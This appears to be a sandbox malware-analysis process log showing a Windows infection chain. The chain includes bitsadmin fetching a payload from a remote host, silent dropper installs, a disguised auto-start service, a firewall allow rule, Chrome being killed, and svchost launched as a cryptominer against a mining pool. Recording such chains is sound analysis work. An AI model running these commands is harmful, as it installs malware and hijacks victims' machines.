C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe"C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1EBSN.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-1EBSN.tmp\irecord.tmp" /SL5="$30550,5808768,66560,C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe" /VERYSILENT13⤵
-
C:\Users\Admin\AppData\Local\Temp\cf-c0c77-214-defb3-f954a08ae9144\Bugyponoku.exe"C:\Users\Admin\AppData\Local\Temp\cf-c0c77-214-defb3-f954a08ae9144\Bugyponoku.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\36-4fbd2-3d5-1d6ab-714269b081753\Maejumyromi.exe"C:\Users\Admin\AppData\Local\Temp\36-4fbd2-3d5-1d6ab-714269b081753\Maejumyromi.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wfu0eydc.aw3\GcleanerEU.exe /eufive & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hccycans.1ip\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe /Verysilent /subid=623 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe /Verysilent /subid=62314⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AIC96.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-AIC96.tmp\Setup3310.tmp" /SL5="$20454,138429,56832,C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe" /Verysilent /subid=62315⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-7BCOD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7BCOD.tmp\Setup.exe" /Verysilent16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exeC:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe"C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe" -a15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe15⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe /S14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx15⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx16⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\boxt0cpw.edg\GcleanerWW.exe /mixone & exit13⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\6368462.exe"C:\Users\Admin\AppData\Roaming\6368462.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\8933555.exe"C:\Users\Admin\AppData\Roaming\8933555.exe"10⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\5617989.exe"C:\Users\Admin\AppData\Roaming\5617989.exe"10⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exeC:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe"C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe" -a7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkswjkle.nxl\jhuuee.exe & exit5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exeC:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe"C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe"7⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exeC:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exeC:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe6⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe7⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe /S & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe /S6⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
- Blocklisted process makes network request
- Checks processor information in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx7⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx8⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"7⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ak51mapg.3ij\GcleanerWW.exe /mixone & exit5⤵
- Blocklisted process makes network request
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\4AEF.exeC:\Users\Admin\AppData\Local\Temp\4AEF.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\4AEF.exe"C:\Users\Admin\AppData\Local\Temp\4AEF.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\4D22.exeC:\Users\Admin\AppData\Local\Temp\4D22.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ttwidmrg\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\peiqysd.exe" C:\Windows\SysWOW64\ttwidmrg\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ttwidmrg binPath= "C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe /d\"C:\Users\Admin\AppData\Local\Temp\4D22.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ttwidmrg "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ttwidmrg2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Users\Admin\AppData\Local\Temp\54D4.exeC:\Users\Admin\AppData\Local\Temp\54D4.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\ttwidmrg\peiqysd.exeC:\Windows\SysWOW64\ttwidmrg\peiqysd.exe /d"C:\Users\Admin\AppData\Local\Temp\4D22.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4952 -s 16682⤵
- Program crash
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5644 -s 28802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9204 -s 6163⤵
- Program crash
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
